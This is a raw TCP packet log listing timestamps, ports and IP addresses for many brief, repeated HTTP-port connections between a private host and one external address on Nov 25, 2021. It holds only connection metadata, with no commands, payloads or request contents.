Nov 25, 2021 10:53:53.937773943 CET	50526	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:53.971929073 CET	80	50526	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:53.972179890 CET	50526	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:53.973665953 CET	50526	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:54.007688999 CET	80	50526	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:54.007888079 CET	50526	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:54.041867971 CET	80	50526	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:54.059832096 CET	80	50526	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:54.059895992 CET	80	50526	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:54.060075998 CET	50526	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:54.060177088 CET	50526	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:54.094300985 CET	80	50526	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:54.451699972 CET	50527	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:54.485133886 CET	80	50527	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:54.485282898 CET	50527	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:54.486840010 CET	50527	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:54.520178080 CET	80	50527	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:54.520416975 CET	50527	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:54.553715944 CET	80	50527	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:54.569268942 CET	80	50527	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:54.569318056 CET	80	50527	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:54.569515944 CET	50527	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:54.569566011 CET	50527	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:54.602847099 CET	80	50527	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:54.939862013 CET	50528	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:54.973732948 CET	80	50528	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:54.973879099 CET	50528	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:54.975392103 CET	50528	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:55.009254932 CET	80	50528	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:55.009502888 CET	50528	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:55.043361902 CET	80	50528	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:55.059514046 CET	80	50528	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:55.059549093 CET	80	50528	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:55.059648991 CET	50528	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:55.059695005 CET	50528	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:55.093524933 CET	80	50528	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:55.373327971 CET	50529	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:55.407058001 CET	80	50529	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:55.407247066 CET	50529	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:55.408843994 CET	50529	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:55.442636013 CET	80	50529	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:55.443159103 CET	50529	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:55.477088928 CET	80	50529	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:55.499511957 CET	80	50529	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:55.499578953 CET	80	50529	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:55.499782085 CET	50529	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:55.499841928 CET	50529	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:55.533854008 CET	80	50529	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:55.899410963 CET	50530	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:55.932854891 CET	80	50530	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:55.933131933 CET	50530	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:55.934689045 CET	50530	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:55.968507051 CET	80	50530	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:55.968638897 CET	50530	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:56.001941919 CET	80	50530	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:56.019726038 CET	80	50530	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:56.019774914 CET	80	50530	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:56.020013094 CET	50530	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:56.020062923 CET	50530	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:56.053667068 CET	80	50530	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:56.405267000 CET	50531	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:56.439471960 CET	80	50531	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:56.439687967 CET	50531	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:56.441220045 CET	50531	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:56.475198984 CET	80	50531	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:56.475426912 CET	50531	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:56.509406090 CET	80	50531	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:56.527676105 CET	80	50531	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:56.527724981 CET	80	50531	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:56.527870893 CET	50531	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:56.527918100 CET	50531	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:56.562110901 CET	80	50531	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:56.927177906 CET	50532	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:56.960570097 CET	80	50532	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:56.960721970 CET	50532	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:56.962356091 CET	50532	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:56.995830059 CET	80	50532	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:56.996151924 CET	50532	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:57.029727936 CET	80	50532	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:57.046289921 CET	80	50532	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:57.046355009 CET	80	50532	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:57.046540022 CET	50532	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:57.046638966 CET	50532	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:57.080322027 CET	80	50532	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:57.483513117 CET	50533	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:57.516788960 CET	80	50533	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:57.516993046 CET	50533	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:57.518579960 CET	50533	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:57.551681042 CET	80	50533	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:57.551886082 CET	50533	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:57.585050106 CET	80	50533	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:57.606286049 CET	80	50533	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:57.606333017 CET	80	50533	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:57.606524944 CET	50533	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:57.606574059 CET	50533	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:57.639828920 CET	80	50533	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:57.985853910 CET	50534	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:58.019630909 CET	80	50534	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:58.020206928 CET	50534	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:58.021953106 CET	50534	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:58.055737019 CET	80	50534	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:58.055908918 CET	50534	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:58.089859962 CET	80	50534	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:58.107873917 CET	80	50534	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:58.107985973 CET	80	50534	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:58.108159065 CET	50534	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:58.108181953 CET	50534	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:58.141942978 CET	80	50534	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:58.474939108 CET	50535	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:58.508310080 CET	80	50535	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:58.508599997 CET	50535	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:58.510118008 CET	50535	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:58.543421030 CET	80	50535	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:58.543663025 CET	50535	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:58.577092886 CET	80	50535	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:58.593468904 CET	80	50535	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:58.593532085 CET	80	50535	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:58.593719959 CET	50535	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:58.593833923 CET	50535	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:58.627206087 CET	80	50535	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:58.997314930 CET	50536	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:59.030841112 CET	80	50536	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:59.031095982 CET	50536	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:59.032651901 CET	50536	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:59.066052914 CET	80	50536	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:59.066267967 CET	50536	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:59.099556923 CET	80	50536	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:59.116414070 CET	80	50536	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:59.116463900 CET	80	50536	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:59.116683006 CET	50536	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:59.116738081 CET	50536	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:59.150289059 CET	80	50536	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:59.495310068 CET	50537	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:59.530097961 CET	80	50537	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:59.530457973 CET	50537	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:59.532044888 CET	50537	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:59.566803932 CET	80	50537	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:59.566987038 CET	50537	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:59.601650000 CET	80	50537	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:59.620790958 CET	80	50537	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:59.620846033 CET	80	50537	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:59.621121883 CET	50537	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:59.621206045 CET	50537	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:59.655503035 CET	80	50537	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:59.948280096 CET	50538	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:59.982175112 CET	80	50538	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:59.982425928 CET	50538	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:59.984023094 CET	50538	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:00.018136978 CET	80	50538	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:00.018450975 CET	50538	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:00.052467108 CET	80	50538	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:00.069199085 CET	80	50538	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:00.069247961 CET	80	50538	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:00.069417000 CET	50538	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:00.069467068 CET	50538	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:00.103579044 CET	80	50538	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:00.458978891 CET	50539	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:00.493139982 CET	80	50539	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:00.493335962 CET	50539	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:00.499475956 CET	50539	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:00.533441067 CET	80	50539	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:00.533643007 CET	50539	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:00.567697048 CET	80	50539	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:00.586044073 CET	80	50539	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:00.586098909 CET	80	50539	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:00.586250067 CET	50539	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:00.586318016 CET	50539	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:00.620547056 CET	80	50539	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:00.959079027 CET	50540	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:00.992885113 CET	80	50540	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:00.993019104 CET	50540	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:00.994605064 CET	50540	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:01.028357983 CET	80	50540	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:01.028495073 CET	50540	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:01.062335014 CET	80	50540	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:01.082277060 CET	80	50540	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:01.082335949 CET	80	50540	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:01.082611084 CET	50540	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:01.082670927 CET	50540	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:01.116682053 CET	80	50540	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:01.432734013 CET	50541	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:01.465904951 CET	80	50541	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:01.466113091 CET	50541	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:01.467669964 CET	50541	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:01.500941038 CET	80	50541	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:01.501169920 CET	50541	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:01.534522057 CET	80	50541	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:01.550327063 CET	80	50541	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:01.550381899 CET	80	50541	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:01.550662994 CET	50541	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:01.550750017 CET	50541	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:01.584074020 CET	80	50541	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:01.926959991 CET	50542	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:01.961051941 CET	80	50542	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:01.961287975 CET	50542	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:01.962780952 CET	50542	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:01.997047901 CET	80	50542	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:01.997369051 CET	50542	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:02.031610012 CET	80	50542	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:02.047734022 CET	80	50542	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:02.047799110 CET	80	50542	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:02.047985077 CET	50542	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:02.048047066 CET	50542	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:02.082113028 CET	80	50542	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:02.438077927 CET	50543	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:02.471487999 CET	80	50543	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:02.471663952 CET	50543	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:02.473185062 CET	50543	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:02.506582975 CET	80	50543	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:02.506793022 CET	50543	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:02.540174961 CET	80	50543	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:02.557339907 CET	80	50543	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:02.557396889 CET	80	50543	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:02.557677984 CET	50543	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:02.557777882 CET	50543	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:02.591439962 CET	80	50543	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:02.963190079 CET	50544	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:02.997267008 CET	80	50544	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:02.997499943 CET	50544	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:02.999053001 CET	50544	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:03.033139944 CET	80	50544	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:03.033376932 CET	50544	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:03.067373037 CET	80	50544	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:03.095596075 CET	80	50544	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:03.095644951 CET	80	50544	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:03.095932007 CET	50544	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:03.095979929 CET	50544	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:03.130312920 CET	80	50544	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:03.478849888 CET	50545	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:03.512263060 CET	80	50545	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:03.512480974 CET	50545	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:03.513998985 CET	50545	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:03.547323942 CET	80	50545	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:03.547540903 CET	50545	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:03.580976963 CET	80	50545	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:03.598150969 CET	80	50545	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:03.598201990 CET	80	50545	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:03.598412991 CET	50545	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:03.598474979 CET	50545	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:03.631905079 CET	80	50545	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:03.979336023 CET	50546	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:04.013431072 CET	80	50546	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:04.013609886 CET	50546	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:04.015227079 CET	50546	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:04.049223900 CET	80	50546	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:04.049458981 CET	50546	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:04.083389997 CET	80	50546	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:04.102054119 CET	80	50546	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:04.102103949 CET	80	50546	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:04.102343082 CET	50546	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:04.102607012 CET	50546	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:04.136271000 CET	80	50546	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:04.487925053 CET	50547	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:04.521466970 CET	80	50547	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:04.521713972 CET	50547	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:04.523262978 CET	50547	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:04.556608915 CET	80	50547	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:04.556833029 CET	50547	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:04.590320110 CET	80	50547	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:04.608227968 CET	80	50547	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:04.608283997 CET	80	50547	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:04.608475924 CET	50547	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:04.608527899 CET	50547	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:04.642107010 CET	80	50547	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:04.994482040 CET	50548	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:05.028568029 CET	80	50548	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:05.028774977 CET	50548	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:05.030325890 CET	50548	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:05.064327002 CET	80	50548	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:05.064660072 CET	50548	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:05.098691940 CET	80	50548	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:05.115741014 CET	80	50548	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:05.115796089 CET	80	50548	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:05.115973949 CET	50548	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:05.116038084 CET	50548	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:05.150223017 CET	80	50548	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:05.465703011 CET	50549	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:05.499618053 CET	80	50549	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:05.499849081 CET	50549	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:05.501409054 CET	50549	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:05.535207987 CET	80	50549	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:05.535341024 CET	50549	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:05.569142103 CET	80	50549	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:05.585587025 CET	80	50549	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:05.585606098 CET	80	50549	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:05.585829020 CET	50549	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:05.585846901 CET	50549	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:05.619718075 CET	80	50549	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:05.927823067 CET	50553	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:05.961204052 CET	80	50553	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:05.961426973 CET	50553	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:05.963027000 CET	50553	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:05.996408939 CET	80	50553	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:05.996619940 CET	50553	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:06.029946089 CET	80	50553	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:06.046257973 CET	80	50553	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:06.046307087 CET	80	50553	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:06.046448946 CET	50553	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:06.046497107 CET	50553	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:06.080146074 CET	80	50553	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:06.437700033 CET	50554	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:06.471236944 CET	80	50554	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:06.471443892 CET	50554	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:06.473005056 CET	50554	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:06.506485939 CET	80	50554	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:06.506829023 CET	50554	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:06.540294886 CET	80	50554	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:06.556282043 CET	80	50554	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:06.556337118 CET	80	50554	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:06.556613922 CET	50554	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:06.556677103 CET	50554	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:06.590131044 CET	80	50554	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:06.883641005 CET	50555	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:06.916743994 CET	80	50555	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:06.917064905 CET	50555	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:06.918600082 CET	50555	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:06.951720953 CET	80	50555	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:06.951936007 CET	50555	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:06.985162973 CET	80	50555	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:07.002161026 CET	80	50555	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:07.002209902 CET	80	50555	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:07.002525091 CET	50555	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:07.002559900 CET	50555	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:07.035964012 CET	80	50555	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:07.354302883 CET	50556	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:07.387780905 CET	80	50556	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:07.387959957 CET	50556	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:07.389478922 CET	50556	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:07.422878981 CET	80	50556	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:07.423141956 CET	50556	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:07.456537008 CET	80	50556	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:07.487277985 CET	80	50556	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:07.487329960 CET	80	50556	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:07.487513065 CET	50556	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:07.487574100 CET	50556	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:07.521039963 CET	80	50556	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:07.858033895 CET	50557	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:07.892122984 CET	80	50557	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:07.892410994 CET	50557	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:07.893918037 CET	50557	80	192.168.11.20	176.223.209.128
